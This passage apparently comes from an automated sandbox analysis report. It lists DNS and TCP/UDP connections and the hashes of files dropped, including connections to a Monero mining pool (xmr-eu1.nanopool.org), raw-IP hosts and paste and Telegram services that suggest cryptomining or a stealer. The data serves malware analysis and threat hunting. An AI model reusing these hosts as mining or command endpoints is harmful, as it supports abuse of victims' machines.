| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| NL | 142.250.179.161:443 | cdn.ampproject.org | tcp |
| US | 8.8.8.8:53 | c1.adform.net | udp |
| US | 8.8.8.8:53 | 192.146.102.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.119.119.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.100.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.70.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.107.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.39.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.93.233.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| IE | 67.220.228.200:443 | aax-eu.amazon-adsystem.com | tcp |
| DK | 37.157.6.241:443 | c1.adform.net | tcp |
| NL | 172.217.168.226:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| NL | 173.223.116.20:443 | contextual.media.net | tcp |
| NL | 104.85.0.200:443 | ads.pubmatic.com | tcp |
| US | 199.127.204.147:443 | sync.1rx.io | tcp |
| US | 8.8.8.8:53 | bttrack.com | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 54.234.180.12:443 | sync.srv.stackadapt.com | tcp |
| US | 192.132.33.46:443 | bttrack.com | tcp |
| US | 192.184.69.201:443 | cms.quantserve.com | tcp |
| US | 8.8.8.8:53 | 200.228.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.6.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 70.42.32.223:443 | b1sync.zemanta.com | tcp |
| US | 8.8.8.8:53 | 20.116.223.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.180.234.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.32.42.70.in-addr.arpa | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 3.221.100.88:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | stags.bluekai.com | udp |
| NL | 23.222.37.108:443 | stags.bluekai.com | tcp |
| US | 8.8.8.8:53 | 88.100.221.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.37.222.23.in-addr.arpa | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | eu-u.openx.net | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | udp |
| NL | 142.251.36.10:443 | translate.googleapis.com | tcp |
| US | 8.8.8.8:53 | links.malwarebytes.com | udp |
| US | 8.8.8.8:53 | lic-iris-content-prod.mwbsys.com | udp |
| US | 18.65.39.48:443 | lic-iris-content-prod.mwbsys.com | tcp |
| NL | 52.222.139.112:443 | links.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 48.39.65.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.102.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 5.75.214.16:12771 | 5.75.214.16 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.214.75.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 54.231.195.9:443 | bbuseruploads.s3.amazonaws.com | tcp |
| NL | 54.192.87.164:80 | ocsp.r2m01.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.195.231.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.87.192.54.in-addr.arpa | udp |
| NL | 142.250.179.138:443 | translate-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | sirius.mwbsys.com | udp |
| US | 34.231.233.183:443 | sirius.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| NL | 52.222.139.14:443 | cdn.mwbsys.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| US | 34.214.161.253:443 | telemetry.malwarebytes.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 5.75.214.16:12771 | 5.75.214.16 | tcp |
| NL | 142.250.179.138:443 | translate-pa.googleapis.com | tcp |
| NL | 185.209.161.89:80 | 185.209.161.89 | tcp |
| US | 8.8.8.8:53 | 89.161.209.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 51.68.190.80:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | rentry.co | udp |
| LU | 198.251.88.130:443 | rentry.co | tcp |
| NL | 51.15.58.224:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 130.88.251.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.58.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.138:443 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.138:443 | optimizationguide-pa.googleapis.com | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 2.19.195.233:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| DE | 172.217.23.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.170:443 | optimizationguide-pa.googleapis.com | udp |
Files
\??\pipe\crashpad_2744_DUWKOZBTZCSKYYSA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8f5fa3d79fbb6ab4879c2180aebcb2a2 |
| SHA1 | ca0777868306b4f0b9239fec5c6fb2a207ca4ff3 |
| SHA256 | 29fa5df5506a84e7828ea759b04168920c9be8650272f384405966f935854543 |
| SHA512 | 4966ebe78a699260719615723db1c93498f2f76bd8596f9616aded767dfa246443efa6cc726c62d7e7235229c16cab942eb59c1dc537139461d6adef857afbd9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f0af080970c752af7efe8e8ae689b645 |
| SHA1 | 847295b885f54323fcc532ebfd3caba8a152df00 |
| SHA256 | 7e03b18537c07229bce344698bfd2ac488c1685e37292baba280fb071de383ca |
| SHA512 | be93b2cfb107d8179dab89c5e931b23ef32ee67367026737bd4e73bbfb48a0a90d1dcf9a1f02bf0a38ba873d7a052b9067ae605936e13740f384e95b0e731cad |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 35db9c8156d5c6e590ef89eb22b9c2ae |
| SHA1 | 4b0be662953084cb0a8a7febc7ac15f1d236f1f0 |
| SHA256 | 1c36819755a27d28b03ed2d963715ff3a7674b4e113d47f85731d5bcea2942c2 |
| SHA512 | adf43c9a869becbc565b009cb16d00d692dc1aa7ab5aded38d083fc03ab8aa490a9ac60a61654c13e7295e2c16689ceb7903d39bde90c6098a2dfae3a620046f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b066b8a152427d3a1c67387a103873cc |
| SHA1 | 27f69af876cc35586c67ebc4e85ea7e37a21d0a5 |
| SHA256 | 200f54d646274ac6a5cc7b246a1d4862f4e2631ea80c268ef7fd59b1196d35ba |
| SHA512 | 7ad98e1d81c8cd50de21763027d1e99e9ec8eae19ba45aaabb375c85eff8aed2176c57dd19f858437c917760ae1bcc9c5cd38a18c685c79c9e5bb9bc73abd83b |
C:\Users\Admin\Downloads\MBSetup.exe
| MD5 | c48e2cf3436f1635a458619d91886e92 |
| SHA1 | 78cc8bb458b136cdc3462b2b41f6400ea9342747 |
| SHA256 | 4c8b08cdb683a25ef54235b96eadf7a2321c3b38a99fc767396728f8c8621333 |
| SHA512 | dc0b241df21d906a4f6fafe1ca9e9b03154ba040462837c86d5f7276cc68a3d91741450a8545634fa4117d8ee3bbf40630078421f0334b3e83b1009e1a7bbd53 |
C:\Users\Admin\Downloads\MBSetup.exe
| MD5 | c48e2cf3436f1635a458619d91886e92 |
| SHA1 | 78cc8bb458b136cdc3462b2b41f6400ea9342747 |
| SHA256 | 4c8b08cdb683a25ef54235b96eadf7a2321c3b38a99fc767396728f8c8621333 |
| SHA512 | dc0b241df21d906a4f6fafe1ca9e9b03154ba040462837c86d5f7276cc68a3d91741450a8545634fa4117d8ee3bbf40630078421f0334b3e83b1009e1a7bbd53 |
C:\Users\Admin\Downloads\MBSetup.exe
| MD5 | c48e2cf3436f1635a458619d91886e92 |
| SHA1 | 78cc8bb458b136cdc3462b2b41f6400ea9342747 |
| SHA256 | 4c8b08cdb683a25ef54235b96eadf7a2321c3b38a99fc767396728f8c8621333 |
| SHA512 | dc0b241df21d906a4f6fafe1ca9e9b03154ba040462837c86d5f7276cc68a3d91741450a8545634fa4117d8ee3bbf40630078421f0334b3e83b1009e1a7bbd53 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b95e92c7d2128b11ebf714ad995663b7 |
| SHA1 | 9df7126f0a9ee3bf2d7d7b2836f62b782e70d4a0 |
| SHA256 | ddeed5c986a62bae2103c7ed840e1fa0e942eac16f9228f4f6db4578cfe0bb16 |
| SHA512 | 1108f731cd95dcffc3404892ed400ebb090d749fa3fb021bbe9dc0baee83a04dd0c3466c07d17c2e3bce92d78762d1e8069e5f88652e85f8794a4eab3a5a8626 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bb9c3e654f544b0a2e48305166627c3e |
| SHA1 | 93892627878fb1134f080aed5429b700c11d9d83 |
| SHA256 | b204e2402389cf8439c62dbf975992ecb55a80e307f7733e8ab9cd333004b606 |
| SHA512 | a7b3ecc0951d411d3dfecfaaaa8fa6ddcc28c2511876f15e5cdd94840d640bc818a8478530bc9213c692eb3ba811afda28c88aab6161fc1741d6e2f4998d558d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c531fcd7c8deeadbd63344dfddb2ec19 |
| SHA1 | aa942aae39e4bfb3797f23a49f6a303838889a90 |
| SHA256 | 250f148d608f3fd54cffcae47c335e66166854b07b477b62bbd6ca4a4507af4b |
| SHA512 | fdaf270949213d91c6a08942e2d6f4c1b9b55a807227bf4c8e12b81bef6f272c84be85945481cc44d44fa37cbe3c7e7d38ad04b555bcc30eef391c0ef6fe0593 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6a295a4847fe9d62cd55f3acb3025af3 |
| SHA1 | d3ad365548b85c3bab2b970526332f25ec866ff6 |
| SHA256 | 97075faf946ddb3ab70cf650371980cfe7222991a43548cdb1bf5919fc7dd03f |
| SHA512 | 3aab4ceb9228a224af65e91190b14983293e717a828827dcf4012f7094b580acddd5b7eedc533aff2a94ee6cc17fd5d5ac71406ed80a6ca8708587ef127a0a07 |
C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
| MD5 | 7f34dad4e136c6130a32e035befa9a52 |
| SHA1 | f06d24d798fdf43c04c5b0b9713253860f405511 |
| SHA256 | 943e93dda161b055724444b210696ca44f957eccdfe1e63c66b722fc4fc6bc63 |
| SHA512 | cd3b8c989618765ceea14dc37dbbb9e3421c0730cf2acc01acc5881442caa5a83730e919e6ac17cf5e97d853a4cc2bdbeae9e98cf7ab3a2c26cd41b10187e91c |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\7z.dll
| MD5 | ab8f0c1a37c0df5c8924aab509db42c9 |
| SHA1 | 53dba959124e6d740829bda2360e851bcb85cce8 |
| SHA256 | 6e223b275b84d948cc5ae1f161f0bfff2adb34de04634c84d7dbe9305a4998d5 |
| SHA512 | ff8a26e8fd5a08c74e5ba93a564e0d3cd932754e7f06993a365bfad06670497889e69ec45bfba1378040b72f82d468e79682beba2439937bb29d2a41da940d4a |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\7z.dll
| MD5 | ab8f0c1a37c0df5c8924aab509db42c9 |
| SHA1 | 53dba959124e6d740829bda2360e851bcb85cce8 |
| SHA256 | 6e223b275b84d948cc5ae1f161f0bfff2adb34de04634c84d7dbe9305a4998d5 |
| SHA512 | ff8a26e8fd5a08c74e5ba93a564e0d3cd932754e7f06993a365bfad06670497889e69ec45bfba1378040b72f82d468e79682beba2439937bb29d2a41da940d4a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 6b5005e9f83515421903b60f58a9bd48 |
| SHA1 | 1922130fbee6c152171224ea1c98b49cff7c70ea |
| SHA256 | 9dc3f154d08ec95dbebb325b1ea80482565b80280835f29bb9708ade114a71e0 |
| SHA512 | d79333e5908cb1758ca224ba6a9e63f65424894bb1bd776cfc99c7d22e1ac06218987629910e8455829baf3f7b15c6d992bdb467f8d2e06fb3eeecd410878566 |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\servicepkg\MBAMService.exe
| MD5 | 827d180e861f5a10fa29f6e6b8807a4d |
| SHA1 | 540108d1280b60bd28f5e1fabce38bdcec91e93e |
| SHA256 | fda3d2617c7cab61e148d08e3d10f3f5468a37eb500b91efecae626f2aaa6c27 |
| SHA512 | 6d46063e0c8518c5dc0a8e827d2543d64edc3e20feb113d1de1ebf0c410a37f9ba9098eaefb01e88024bc8cd11c618ffdace2cc0724a2b4788b4dd233cbb8e80 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c22cb1190c6a6c699e5fa772c1783a7d |
| SHA1 | 42302267333b82147fb5f8a696fc38036df10669 |
| SHA256 | f6c231577238276ac54f00cc137607b147decf33663ce2956f0ddbd8db68931b |
| SHA512 | 53bb08b794feeeabd3266774a082c6da9ca24929cbe52b18aa490b0267775bca87a47971c0db01afad321d1a6c1d9f5714a9f20f8cb27b3b152f2fdc79cac175 |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\servicepkg\mbamelam.sys
| MD5 | 9e77c51e14fa9a323ee1635dc74ecc07 |
| SHA1 | a78bde0bd73260ce7af9cdc441af9db54d1637c2 |
| SHA256 | b5619d758ae6a65c1663f065e53e6b68a00511e7d7accb3e07ed94bfd0b1ede0 |
| SHA512 | a12ccf92bead694f5d3cba7ff7e731a2f862198efc338efc7f33a882fe0eb7499fb3fb533538d0a823e80631a7ca162962fbdfd78e401e3255672910b7140186 |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\servicepkg\mbamelam.cat
| MD5 | 60608328775d6acf03eaab38407e5b7c |
| SHA1 | 9f63644893517286753f63ad6d01bc8bfacf79b1 |
| SHA256 | 3ed5a1668713ef80c2b5599b599f1434ad6648999f335cf69757ea3183c70c59 |
| SHA512 | 9f65212121b8a5d1a0625c3baa14ef04a33b091d26f543324333e38dcdb903e02ccc4d009e22c2e85d2f61d954e0b994c2896e52f685003a6ef34758f8a650c7 |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\servicepkg\mbamelam.inf
| MD5 | c481ad4dd1d91860335787aa61177932 |
| SHA1 | 81633414c5bf5832a8584fb0740bc09596b9b66d |
| SHA256 | 793626d240fd8eefc81b78a57c8dfe12ea247889b6f07918e9fd32a7411aa1c3 |
| SHA512 | d292e028936412f07264837d4a321ecfa2f5754d4048c8bcf774a0e076e535b361c411301558609d64c71c1ce9b19e6041efa44d201237a7010c553751e1e830 |
C:\Program Files\Malwarebytes\Anti-Malware\srvversion.dat
| MD5 | f33742967e3940a2cf564dd4730d84ae |
| SHA1 | fe914bdc2885bd3c09abd7811c0ffcec6574827d |
| SHA256 | 39262a64764a8a6e45a65810b8178905e31c50756db299258abaaedd6a28f157 |
| SHA512 | 10205f3291c79b6e1901333cc4a9491168b3cd65a14ae7fd7abec2cb9bbbcdeb3617e240d45d16bb252cc11402e6938cd50f7f0e19ac08b67a5bec01b045ec9f |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\uipkg\QtQuick\Controls.2\HorizontalHeaderView.qml
| MD5 | d8c9674c0e9bddbd8aa59a9d343cf462 |
| SHA1 | 490aa022ac31ddce86d5b62f913b23fbb0de27c2 |
| SHA256 | 1ef333b5fb4d8075973f312ef787237240b9f49f3f9185fb21202883f900e7d7 |
| SHA512 | 0b86ec673133f6400c38b79f9ba4f7b37ce5afdab1a2e34acbf75019e2590cc26b26d323ddc1567c91375053c9c8593be0615389db8eb1a8d1eb084ad4200b82 |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\uipkg\QtQuick\Controls.2\Imagine\VerticalHeaderView.qml
| MD5 | 829769b2741d92df3c5d837eee64f297 |
| SHA1 | f61c91436ca3420c4e9b94833839fd9c14024b69 |
| SHA256 | 489c02f8716e7a1de61834b3d8bbb61bce91ca4a33a6b62342b4c851d93e51e0 |
| SHA512 | 4061c271db37523b9dea9a9973226d91337e1809d4e7767e57ac938d35d77a302363ed92ab4be18c35ba589f528194ad71c93a8507449bf74dd035acf7cdb521 |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\ctlrpkg\mbae64.sys
| MD5 | 95515708f41a7e283d6725506f56f6f2 |
| SHA1 | 9afc20a19db3d2a75b6915d8d9af602c5218735e |
| SHA256 | 321058a27d7462e55e39d253ad5d8b19a9acf754666400f82fe0542f33e733c6 |
| SHA512 | d9230901adeecb13b1f92287abe9317cdac458348885b96ef6500960793a7586c76ae374df053be948a35b44abe934aa853975a6ccd3788f93909903cc718c08 |
C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat
| MD5 | f23d1d997bb73f4a3f00198250641872 |
| SHA1 | 0b0fee904bffec18aa40570f0b026512d8cd07fe |
| SHA256 | dbfb774da2ba0a6c908fdfb227cb73b16d016271baa4b072ff501ea430537728 |
| SHA512 | 167462827ffa1620b7e987703b491b3be44a9ac7277ac14477eb81c3e068ce76dc5963ef119e3ec617a12db2753f375e96cb6d44110b90a730c2e1d84991b255 |
C:\Program Files\Malwarebytes\Anti-Malware\version.dat
| MD5 | bc1829ff624943dba1e2b0c486119585 |
| SHA1 | bfe8e65737fd67c3300b1a3b653f69473855f2c7 |
| SHA256 | 83856b2e251983352b0792e0c7584e03b2ab9885182bae1a29bddd391f9b58dc |
| SHA512 | d92cc3e309b8d99a17270b2211b67c98005bf52ef578ef047cf28a115d488c0aa57fc7e310aac3e0b47f78ace31c6bb2a1204ab327517abda6d663f66adcd004 |
C:\Program Files\Malwarebytes\Anti-Malware\uipkgver.dat
| MD5 | 74c6677020fc6b6c867aab117078bf5f |
| SHA1 | 8c46db37dc0b39eb963d4144539c8b591e122400 |
| SHA256 | cdbb9bc874d71e154c71b68b1fe959913d286036dac11e226e5620c919ba9708 |
| SHA512 | 3f9db8d9bb25322f8d8e750750bf92dbe6ac63d686eced65cddfcd61178cf0e947118a491058414d4d2cbb4892e39815565669aee0dfdda23aece72d278292d0 |
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
| MD5 | 429143e480f6943bb8560df80d1ff895 |
| SHA1 | 0f1f046fb3a53530d931f3373bbd6a35922edd49 |
| SHA256 | bac7e659463c89fad1742a7896406c93deba75f6a0217295ba8047e883863df1 |
| SHA512 | 4d75bba8dbaad88c9df30badd4a697739b52d396b3de866b891696a713b0c172ba4817937423bb6defe41cde9815edcb55a7d5f8a708d3ad22e2382457ce25c5 |
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
| MD5 | 827d180e861f5a10fa29f6e6b8807a4d |
| SHA1 | 540108d1280b60bd28f5e1fabce38bdcec91e93e |
| SHA256 | fda3d2617c7cab61e148d08e3d10f3f5468a37eb500b91efecae626f2aaa6c27 |
| SHA512 | 6d46063e0c8518c5dc0a8e827d2543d64edc3e20feb113d1de1ebf0c410a37f9ba9098eaefb01e88024bc8cd11c618ffdace2cc0724a2b4788b4dd233cbb8e80 |
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
| MD5 | 827d180e861f5a10fa29f6e6b8807a4d |
| SHA1 | 540108d1280b60bd28f5e1fabce38bdcec91e93e |
| SHA256 | fda3d2617c7cab61e148d08e3d10f3f5468a37eb500b91efecae626f2aaa6c27 |
| SHA512 | 6d46063e0c8518c5dc0a8e827d2543d64edc3e20feb113d1de1ebf0c410a37f9ba9098eaefb01e88024bc8cd11c618ffdace2cc0724a2b4788b4dd233cbb8e80 |
C:\Program Files\Malwarebytes\Anti-Malware\MbamElam.sys
| MD5 | 9e77c51e14fa9a323ee1635dc74ecc07 |
| SHA1 | a78bde0bd73260ce7af9cdc441af9db54d1637c2 |
| SHA256 | b5619d758ae6a65c1663f065e53e6b68a00511e7d7accb3e07ed94bfd0b1ede0 |
| SHA512 | a12ccf92bead694f5d3cba7ff7e731a2f862198efc338efc7f33a882fe0eb7499fb3fb533538d0a823e80631a7ca162962fbdfd78e401e3255672910b7140186 |
C:\Program Files\Malwarebytes\Anti-Malware\MbamElam.inf
| MD5 | c481ad4dd1d91860335787aa61177932 |
| SHA1 | 81633414c5bf5832a8584fb0740bc09596b9b66d |
| SHA256 | 793626d240fd8eefc81b78a57c8dfe12ea247889b6f07918e9fd32a7411aa1c3 |
| SHA512 | d292e028936412f07264837d4a321ecfa2f5754d4048c8bcf774a0e076e535b361c411301558609d64c71c1ce9b19e6041efa44d201237a7010c553751e1e830 |
C:\Program Files\Malwarebytes\Anti-Malware\MbamElam.cat
| MD5 | 60608328775d6acf03eaab38407e5b7c |
| SHA1 | 9f63644893517286753f63ad6d01bc8bfacf79b1 |
| SHA256 | 3ed5a1668713ef80c2b5599b599f1434ad6648999f335cf69757ea3183c70c59 |
| SHA512 | 9f65212121b8a5d1a0625c3baa14ef04a33b091d26f543324333e38dcdb903e02ccc4d009e22c2e85d2f61d954e0b994c2896e52f685003a6ef34758f8a650c7 |
C:\Windows\Temp\MBInstallTemp98e8c6a32b2e11eebaed72a452026d15\servicepkg\mbshlext.dll
| MD5 | b7e5071b317550d93258f7e1e13e7b6f |
| SHA1 | 2d08d78a5c29cf724bc523530d1a9014642bbc60 |
| SHA256 | 467de01d7cee7ec54166b80658ff22f9feebdb1c24eaf1629cf40e4124508064 |
| SHA512 | 9c35293c95c1a9141740ac99315605964aa37c4a42d3a11cae9e5649ff1427a9480d3d5e7f763212cf13db3511c5ea3c84e68f95f0067fe6339a9d3fb7b27c54 |
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
| MD5 | 827d180e861f5a10fa29f6e6b8807a4d |
| SHA1 | 540108d1280b60bd28f5e1fabce38bdcec91e93e |
| SHA256 | fda3d2617c7cab61e148d08e3d10f3f5468a37eb500b91efecae626f2aaa6c27 |
| SHA512 | 6d46063e0c8518c5dc0a8e827d2543d64edc3e20feb113d1de1ebf0c410a37f9ba9098eaefb01e88024bc8cd11c618ffdace2cc0724a2b4788b4dd233cbb8e80 |
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json
| MD5 | 429143e480f6943bb8560df80d1ff895 |
| SHA1 | 0f1f046fb3a53530d931f3373bbd6a35922edd49 |
| SHA256 | bac7e659463c89fad1742a7896406c93deba75f6a0217295ba8047e883863df1 |
| SHA512 | 4d75bba8dbaad88c9df30badd4a697739b52d396b3de866b891696a713b0c172ba4817937423bb6defe41cde9815edcb55a7d5f8a708d3ad22e2382457ce25c5 |
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json.bak
| MD5 | 429143e480f6943bb8560df80d1ff895 |
| SHA1 | 0f1f046fb3a53530d931f3373bbd6a35922edd49 |
| SHA256 | bac7e659463c89fad1742a7896406c93deba75f6a0217295ba8047e883863df1 |
| SHA512 | 4d75bba8dbaad88c9df30badd4a697739b52d396b3de866b891696a713b0c172ba4817937423bb6defe41cde9815edcb55a7d5f8a708d3ad22e2382457ce25c5 |
C:\Program Files\Malwarebytes\Anti-Malware\offreg.dll
| MD5 | 16663d125398773a90d0a53333b7cf5e |
| SHA1 | f92928ae3c9292588547ceaca1cb1d372bfd7936 |
| SHA256 | 38e6811b47262101759aa51a631263d9e3eee5d211164318a751e078afec4cbc |
| SHA512 | 091764b8ad80aa31eea0bbd91ee505ebdea2654bc8aeaa3081a061d0d37ab13d27dd203075fd0de10c6687591aa0e36139a38af846c4e34e6aa67ab81dc277df |
C:\Program Files\Malwarebytes\Anti-Malware\offreg.dll
| MD5 | 16663d125398773a90d0a53333b7cf5e |
| SHA1 | f92928ae3c9292588547ceaca1cb1d372bfd7936 |
| SHA256 | 38e6811b47262101759aa51a631263d9e3eee5d211164318a751e078afec4cbc |
| SHA512 | 091764b8ad80aa31eea0bbd91ee505ebdea2654bc8aeaa3081a061d0d37ab13d27dd203075fd0de10c6687591aa0e36139a38af846c4e34e6aa67ab81dc277df |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
| MD5 | 5471d57066b9c30fd2ded9353ef0cf85 |
| SHA1 | 21d231c088ac7e983f0d620c3f172fa0fa373e3b |
| SHA256 | 1454ea0493b479bff5c3e27a7600d24f61d107451c05902cc6dff4abf86533f0 |
| SHA512 | 1409a79e6b35253f3276425de518eb760623065c2c6290fffba3fa9b75675b7456b7cd535c54b7a4b9ca3cc5f5df9231727d2d531e9e824e7192c4e03ce23b83 |
C:\Program Files\Malwarebytes\Anti-Malware\PoliciesControllerImpl.dll
| MD5 | 5471d57066b9c30fd2ded9353ef0cf85 |
| SHA1 | 21d231c088ac7e983f0d620c3f172fa0fa373e3b |
| SHA256 | 1454ea0493b479bff5c3e27a7600d24f61d107451c05902cc6dff4abf86533f0 |
| SHA512 | 1409a79e6b35253f3276425de518eb760623065c2c6290fffba3fa9b75675b7456b7cd535c54b7a4b9ca3cc5f5df9231727d2d531e9e824e7192c4e03ce23b83 |
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json
| MD5 | 0aadb1b6b0fcff6dc7b4a946abf181f1 |
| SHA1 | 0191472c05c786e0c51f290900e009f2787ad80b |
| SHA256 | 026be320cbb83c79639b46bbda967dd2c4d95082a932ea91ee850f68fa77a116 |
| SHA512 | 97d1a2eee8092068fa459ffd3483771d97520f564dd840dc4f36fed9ce4b9151f642eb341ccfe5f0932806f2f65a1ed7134bd8032ae0fded9ad1df3a0bf4b5b6 |
C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll
| MD5 | b7e5071b317550d93258f7e1e13e7b6f |
| SHA1 | 2d08d78a5c29cf724bc523530d1a9014642bbc60 |
| SHA256 | 467de01d7cee7ec54166b80658ff22f9feebdb1c24eaf1629cf40e4124508064 |
